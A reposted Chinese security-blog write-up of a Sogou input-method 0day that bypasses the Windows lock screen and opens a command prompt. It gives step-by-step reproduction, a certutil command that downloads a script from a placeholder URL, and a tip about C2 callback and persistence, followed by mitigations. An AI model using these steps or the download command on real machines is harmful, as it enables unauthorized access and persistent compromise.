点击蓝字 关注我们 / Vuln's Day
1.在Windows锁屏状态下,可绕过系统登录密码,调用cmd执行任意命令
2.要求该主机处于联网状态
3.win10、win11均受其影响
搜狗输入法0day
1.Windows处于锁屏状态下,切换至搜狗输入法,调出屏幕键盘
2.拖动屏幕键盘两次或者右击直至出现搜狗输入法状态栏,单击搜狗输入法菜单,进入游戏中心(未安装时需要进行初始化)
3.点击登录,选择QQ登录,选择QQ手机版,进入QQ官网首页,进行下载
4.此时弹出下载另存为对话框,即可在Windows搜索框输入cmd进入命令行执行命令,若权限不足可右击以管理员权限运行
5.此时可执行任意与登录后无异的命令,甚至可下载恶意脚本文件:
certutil -urlcache -split -f URL/fileName1.近源攻击更好用,如果远端,可以考虑下载恶意脚本进行C2上线&权限维持
2.缓解措施:
暂时隐藏搜狗输入法状态栏
个人终端请关闭mstsc远程连接,服务器资产请修改远程链接默认端口3389或卸载搜狗输入法
2.访问搜狗官网下载时,请务必注意钓鱼网站
原文始发于微信公众号(东方隐侠安全团队):烽火狼烟|搜狗输入法0day复现及分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论